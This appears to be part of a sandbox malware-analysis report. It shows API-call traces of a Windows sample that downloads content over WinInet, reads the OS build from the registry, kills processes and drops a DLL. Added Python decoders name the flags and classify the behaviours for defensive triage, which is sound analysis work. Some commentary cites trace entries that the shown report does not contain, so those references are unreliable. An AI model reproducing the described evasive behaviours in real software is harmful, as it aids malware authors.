                                        • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0097501A
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00975021
                                        • InternetOpenA.WININET(00990DE3,00000000,00000000,00000000,00000000), ref: 0097503A
                                        • InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00975061
                                        • InternetReadFile.WININET(?,?,00000400,00000000), ref: 00975091
                                        • InternetCloseHandle.WININET(?), ref: 00975109
                                        • InternetCloseHandle.WININET(?), ref: 00975116
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Internet$CloseHandleHeapOpen$AllocateFileProcessRead
                                        • String ID:
                                        • API String ID: 3066467675-0
                                        • Opcode ID: 664d49208b969f96f0dbaf6851f32254545a2942d7f5b4a6bb90f63d83b0b64e
                                        • Instruction ID: 3d4c022d2a5b4d61257b9b0ade9d299e3e7bbf0e7036366a19bdd020ef84361c
                                        • Opcode Fuzzy Hash: 664d49208b969f96f0dbaf6851f32254545a2942d7f5b4a6bb90f63d83b0b64e
                                        • Instruction Fuzzy Hash: 303105B5A44218ABDB20DF54DC85BDCB7B4BB48304F1085D9FA09A7281DBB46EC58F98
                                        APIs
                                        • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 009885B6
                                        • wsprintfA.USER32 ref: 009885E9
                                        • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0098860B
                                        • RegCloseKey.ADVAPI32(00000000), ref: 0098861C
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00988629
                                          • Part of subcall function 0098AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0098AAF6
                                        • RegQueryValueExA.ADVAPI32(00000000,0181F5C0,00000000,000F003F,?,00000400), ref: 0098867C
                                        • lstrlen.KERNEL32(?), ref: 00988691
                                        • RegQueryValueExA.ADVAPI32(00000000,0181F5A8,00000000,000F003F,?,00000400,00000000,?,?,00000000,?,00990B3C), ref: 00988729
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00988798
                                        • RegCloseKey.ADVAPI32(00000000), ref: 009887AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
                                        • String ID: %s\%s
                                        • API String ID: 3896182533-4073750446
                                        • Opcode ID: 5bcbd2f1f2f0cd045b738442e45a80d5ff5703ec862cc82fb6824a3c0c693189
                                        • Instruction ID: e8e16c666f135e4faad97ddfdd6abaf5f5ca273dd53b5439c9aec2ec68bae02f
                                        • Opcode Fuzzy Hash: 5bcbd2f1f2f0cd045b738442e45a80d5ff5703ec862cc82fb6824a3c0c693189
                                        • Instruction Fuzzy Hash: 2D212A75A1021CABDB24DB54DC85FE9B3B8FB48704F0085D9E609A6280DF746A85CFE4
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009899C5
                                        • Process32First.KERNEL32(0097A056,00000128), ref: 009899D9
                                        • Process32Next.KERNEL32(0097A056,00000128), ref: 009899F2
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00989A4E
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 00989A6C
                                        • CloseHandle.KERNEL32(00000000), ref: 00989A79
                                        • CloseHandle.KERNEL32(0097A056), ref: 00989A88
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                        • String ID:
                                        • API String ID: 2696918072-0
                                        • Opcode ID: ddc58485e4baa2890d501504b47c9c910b6a68e98c22f92cc37608bb4ed0d84d
                                        • Instruction ID: 72b5ffa6696e6b874a23778695a908a932e985782418941fdb2b5ee10c989291
                                        • Opcode Fuzzy Hash: ddc58485e4baa2890d501504b47c9c910b6a68e98c22f92cc37608bb4ed0d84d
                                        • Instruction Fuzzy Hash: AE21FC75904218EBDB25EFA1DC88BEDB7B9BB49300F1446C8E50AA7290D7749E84CF90
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00987834
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 0098783B
                                        • RegOpenKeyExA.ADVAPI32(80000002,0180BA00,00000000,00020119,00000000), ref: 0098786D
                                        • RegQueryValueExA.ADVAPI32(00000000,0181F4A0,00000000,00000000,?,000000FF), ref: 0098788E
                                        • RegCloseKey.ADVAPI32(00000000), ref: 00987898
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: Windows 11
                                        • API String ID: 3225020163-2517555085
                                        • Opcode ID: c2e1bdcb7034bec1923b50e84f6d5f94ec18fd934e579ed9ac3194bc10e14849
                                        • Instruction ID: 9cf5002ae740715c61949dec7ff422ab52a3635b0696e99afc014d7bc382ab23
                                        • Opcode Fuzzy Hash: c2e1bdcb7034bec1923b50e84f6d5f94ec18fd934e579ed9ac3194bc10e14849
                                        • Instruction Fuzzy Hash: 68012C79A08304FBEB10EBE4DD89F6EB7B8BB49700F104198FA05A7290D7B099008B91
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104), ref: 009878C4
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 009878CB
                                        • RegOpenKeyExA.ADVAPI32(80000002,0180BA00,00000000,00020119,00987849), ref: 009878EB
                                        • RegQueryValueExA.ADVAPI32(00987849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0098790A
                                        • RegCloseKey.ADVAPI32(00987849), ref: 00987914
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                         • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                         • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                        • String ID: CurrentBuildNumber
                                        • API String ID: 3225020163-1022791448
                                        • Opcode ID: 8e198719086b23b3bb5bef241a08a15292a41ff4d7656dcff74ab9e0067152c9
                                        • Instruction ID: f0fc12f63c5ac0397c0b990259133d81c20c3cca21f189a32d5acbffdb1fcafb
                                        • Opcode Fuzzy Hash: 8e198719086b23b3bb5bef241a08a15292a41ff4d7656dcff74ab9e0067152c9
                                        • Instruction Fuzzy Hash: 7E01F4B9A44309FFDB10DBE4DC49FAEB778FB45700F104594F615A7291D7B05A008BA1
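The entries above for the chrome.dll drop (ref 00989871 onward), the WinInet download loop (ref 00975061, InternetOpenUrlA with dwFlags 04000100 and 0x400-byte InternetReadFile chunks), the Toolhelp32 process-termination loop (ref 009899C5, OpenProcess with dwDesiredAccess 00000001) and the two CurrentBuildNumber / "Windows 11" registry reads (refs 0098786D and 009878EB, samDesired 00020119) all present their arguments as raw hexadecimal stack values. The Python below is an added example, not part of the report or of the sample: it parses API lines in the report's own format (the lines in TRACE are copied from the entries above as constructed input), decodes the documented Win32 flag values, and names the behaviour each sequence implies. Two assumptions are the example's own: the file path is taken to be the last string-typed argument on a line, and the build-number thresholds (22000 for Windows 11, 10240 for Windows 10) are the public release builds, which the report itself does not state.

```python
import re

# Constructed input: API lines copied from the report entries above.
TRACE = r"""
• Part of subcall function 00989850: CreateFileA.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,009808DC,C:\ProgramData\chrome.dll), ref: 00989871
• Part of subcall function 0097A090: LoadLibraryA.KERNEL32(C:\ProgramData\chrome.dll), ref: 0097A098
• DeleteFileA.KERNEL32(C:\ProgramData\chrome.dll), ref: 00980C35
• InternetOpenUrlA.WININET(?,00000000,00000000,00000000,04000100,00000000), ref: 00975061
• InternetReadFile.WININET(?,?,00000400,00000000), ref: 00975091
• CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 009899C5
• OpenProcess.KERNEL32(00000001,00000000,?), ref: 00989A4E
• TerminateProcess.KERNEL32(00000000,00000000), ref: 00989A6C
• RegOpenKeyExA.ADVAPI32(80000002,0180BA00,00000000,00020119,00987849), ref: 009878EB
• RegQueryValueExA.ADVAPI32(00987849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 0098790A
"""

LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function [0-9A-F]+:\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\)(?:,\s*ref:\s*(?P<ref>[0-9A-F]+))?\s*$")
HEX_RE = re.compile(r"^[0-9A-F]{8}$")

# Documented Win32 values. Composite masks (KEY_READ) sort first so they are consumed
# before the individual bits they contain.
GENERIC = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING", 4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
INET = {0x80000000: "INTERNET_FLAG_RELOAD", 0x04000000: "INTERNET_FLAG_NO_CACHE_WRITE",
        0x00800000: "INTERNET_FLAG_SECURE", 0x00000100: "INTERNET_FLAG_PRAGMA_NOCACHE"}
PROC = {0x0001: "PROCESS_TERMINATE", 0x0008: "PROCESS_VM_OPERATION", 0x0010: "PROCESS_VM_READ",
        0x0020: "PROCESS_VM_WRITE", 0x0400: "PROCESS_QUERY_INFORMATION"}
HIVE = {0x80000001: "HKEY_CURRENT_USER", 0x80000002: "HKEY_LOCAL_MACHINE"}
SAM = {0x20019: "KEY_READ", 0x0100: "KEY_WOW64_64KEY", 0x0200: "KEY_WOW64_32KEY"}


def decode_flags(value, table):
    """Name every mask in `table` fully contained in `value`; leftover bits stay as hex."""
    names, rest = [], value
    for mask, name in sorted(table.items(), reverse=True):
        if mask and rest & mask == mask:
            names.append(name)
            rest &= ~mask
    if rest:
        names.append(hex(rest))
    return names


def parse_trace(text):
    """Turn report lines into dicts: api, mod, args (int / None for '?' / str), ref."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        args = []
        for a in (m["args"].split(",") if m["args"] else []):
            a = a.strip()
            args.append(None if a == "?" else int(a, 16) if HEX_RE.match(a) else a)
        calls.append({"api": m["api"], "mod": m["mod"], "args": args, "ref": m["ref"]})
    return calls


def _strings(c):
    return [a for a in c["args"] if isinstance(a, str)]


def classify(calls):
    """Map API sequences to behaviours; each result carries the supporting refs."""
    found = {}
    # 1. Same path written with GENERIC_WRITE, then LoadLibraryA'd, then deleted.
    written = {_strings(c)[-1].lower(): c for c in calls
               if c["api"] == "CreateFileA" and _strings(c)
               and "GENERIC_WRITE" in decode_flags(c["args"][1], GENERIC)}
    for c in calls:
        path = _strings(c)[-1].lower() if c["api"] == "LoadLibraryA" and _strings(c) else None
        if path in written:
            deleted = [d["ref"] for d in calls if d["api"] == "DeleteFileA" and _strings(d)
                       and _strings(d)[-1].lower() == path]
            if deleted:
                found["drop_load_delete"] = {"path": path,
                    "disposition": DISPOSITION.get(written[path]["args"][4]),
                    "refs": [written[path]["ref"], c["ref"], *deleted]}
    # 2. WinInet fetch; NO_CACHE_WRITE means the payload never lands in the WinInet cache.
    for c in calls:
        if c["api"] == "InternetOpenUrlA" and isinstance(c["args"][4], int):
            flags = decode_flags(c["args"][4], INET)
            reads = [r for r in calls if r["api"] == "InternetReadFile"]
            found["http_download"] = {"flags": flags,
                "no_cache": "INTERNET_FLAG_NO_CACHE_WRITE" in flags,
                "chunk": reads[0]["args"][2] if reads else None,
                "refs": [c["ref"], *[r["ref"] for r in reads]]}
    # 3. Process enumeration plus termination through a PROCESS_TERMINATE handle.
    by_api = {c["api"]: c for c in calls}
    if {"CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess"}.issubset(by_api):
        found["process_kill"] = {"access": decode_flags(by_api["OpenProcess"]["args"][0], PROC),
            "refs": [by_api[a]["ref"] for a in ("CreateToolhelp32Snapshot", "OpenProcess", "TerminateProcess")]}
    # 4. OS fingerprint: CurrentBuildNumber read right after a RegOpenKeyExA.
    for o, q in zip(calls, calls[1:]):
        if o["api"] == "RegOpenKeyExA" and q["api"] == "RegQueryValueExA" and "CurrentBuildNumber" in _strings(q):
            found["os_fingerprint"] = {"hive": HIVE.get(o["args"][0], hex(o["args"][0])),
                "sam": decode_flags(o["args"][3], SAM), "refs": [o["ref"], q["ref"]]}
    return found


def windows_product_from_build(build):
    """Public release thresholds (assumption: the sample's own cut-offs are not in the report)."""
    build = int(build)
    return "Windows 11" if build >= 22000 else "Windows 10" if build >= 10240 else "pre-Windows 10"


if __name__ == "__main__":
    for name, info in classify(parse_trace(TRACE)).items():
        print(name, info)
```

Run on the lines above this reports dwFlags 04000100 as INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_PRAGMA_NOCACHE, so the downloaded content will not be found in the WinInet cache during triage; samDesired 00020119 as KEY_READ | KEY_WOW64_64KEY, meaning this 32-bit image explicitly asks for the 64-bit registry view when reading the build number; and OpenProcess with PROCESS_TERMINATE only, which is the minimum right needed for the TerminateProcess that follows and is itself a usable hunting predicate in handle-audit telemetry.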
                                        APIs
                                        • memset.MSVCRT ref: 00984325
                                        • RegOpenKeyExA.ADVAPI32(80000001,0181E0C8,00000000,00020119,?), ref: 00984344
                                        • RegQueryValueExA.ADVAPI32(?,0181F6E0,00000000,00000000,00000000,000000FF), ref: 00984368
                                        • RegCloseKey.ADVAPI32(?), ref: 00984372
                                        • lstrcat.KERNEL32(?,00000000), ref: 00984397
                                        • lstrcat.KERNEL32(?,0181F740), ref: 009843AB
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$CloseOpenQueryValuememset
                                        • String ID:
                                        • API String ID: 2623679115-0
                                        • Opcode ID: 7843ef49e7c91c3117d96576a3f6e856a67ee6c7dff356e637c2bf08b4c168c1
                                        • Instruction ID: 79548413afd54521b7a52bc298d0b3c26203f7cf38afc5b29a436c4dcd31cb44
                                        • Opcode Fuzzy Hash: 7843ef49e7c91c3117d96576a3f6e856a67ee6c7dff356e637c2bf08b4c168c1
                                        • Instruction Fuzzy Hash: 794158B7900108ABDB18FBA0EC56FEE773DBBC9700F008558B71957185EA7556888BD2
                                        APIs
                                        • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0097A13C
                                        • GetFileSizeEx.KERNEL32(000000FF,?), ref: 0097A161
                                        • LocalAlloc.KERNEL32(00000040,?), ref: 0097A181
                                        • ReadFile.KERNEL32(000000FF,?,00000000,0097148F,00000000), ref: 0097A1AA
                                        • LocalFree.KERNEL32(0097148F), ref: 0097A1E0
                                        • CloseHandle.KERNEL32(000000FF), ref: 0097A1EA
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.2240538270.0000000000971000.00000040.00000001.01000000.00000003.sdmp, Offset: 00970000, based on PE: true
                                        • Associated: 00000000.00000002.2240517938.0000000000970000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.000000000099C000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AAD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000AB9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000ADE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240538270.0000000000C46000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000C5A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000DE7000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EC1000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EE3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EEB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2240757766.0000000000EF9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241007817.0000000000EFA000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241122152.0000000001093000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.2241139365.0000000001094000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_970000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                        • String ID:
                                        • API String ID: 2311089104-0
                                        • Opcode ID: 29de1d86c867c03a4b4dfc482809d15fcae15700251b3f46f72533772b89f5b2
                                        • Instruction ID: b5e0fb68cb0541fce3934710fd23a3acb366e1ff95fa867a7ba75a0634bbd491
                                        • Opcode Fuzzy Hash: 29de1d86c867c03a4b4dfc482809d15fcae15700251b3f46f72533772b89f5b2
                                        • Instruction Fuzzy Hash: 72313274A04209EFDB14CF94C885BDE77B9FF88701F508158E915A7390D774AA41CFA1
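The argument values in these traces are raw stack words, and decoding them is what turns the listing into findings: the 00020119 access mask passed to RegOpenKeyExA is KEY_READ with KEY_WOW64_64KEY set, so this 32-bit sample deliberately opens the 64-bit registry view; CreateFileA is called with GENERIC_READ, FILE_SHARE_READ and OPEN_EXISTING and the read buffer comes from LocalAlloc(LPTR); the SHGetFolderPathA subcall in the path-building function further down resolves CSIDL 0x1C, CSIDL_LOCAL_APPDATA. Note also that Joe Sandbox prints more stack slots than the API has parameters (seven values for the five-parameter SHGetFolderPathA), so only the leading positions are meaningful. The decoder below is an added example written for this page; it is not part of the Joe Sandbox report or its IDA plugin. Its sample lines are copied from the listing, and its constant tables cover only the APIs that occur here.

```python
"""Decode the raw hex arguments in Joe Sandbox API-trace lines into named Win32 constants.

Added example for this page (not Joe Sandbox code). Input lines look like
    • RegOpenKeyExA.ADVAPI32(80000001,0181E0C8,00000000,00020119,?), ref: 00984344
where every argument is a bare stack word and "?" marks a slot the sandbox could not recover.
"""
import re
from typing import Callable, Dict, List, Optional, Tuple

LINE_RE = re.compile(
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"   # indented "Part of subcall" form
    r"(?P<api>\w+)\.(?P<mod>\w+)"                                 # API.MODULE
    r"(?:\((?P<args>[^)]*)\))?"                                   # optional argument list
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"                          # call-site address
)

HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
# composite masks first (widest to narrowest), then single bits
KEY_MASKS = [(0xF003F, "KEY_ALL_ACCESS"), (0x20019, "KEY_READ"), (0x20006, "KEY_WRITE"),
             (0x1, "KEY_QUERY_VALUE"), (0x2, "KEY_SET_VALUE"), (0x4, "KEY_CREATE_SUB_KEY"),
             (0x8, "KEY_ENUMERATE_SUB_KEYS"), (0x10, "KEY_NOTIFY"), (0x20, "KEY_CREATE_LINK"),
             (0x100, "KEY_WOW64_64KEY"), (0x200, "KEY_WOW64_32KEY")]
GENERIC_MASKS = [(0x80000000, "GENERIC_READ"), (0x40000000, "GENERIC_WRITE"),
                 (0x20000000, "GENERIC_EXECUTE"), (0x10000000, "GENERIC_ALL")]
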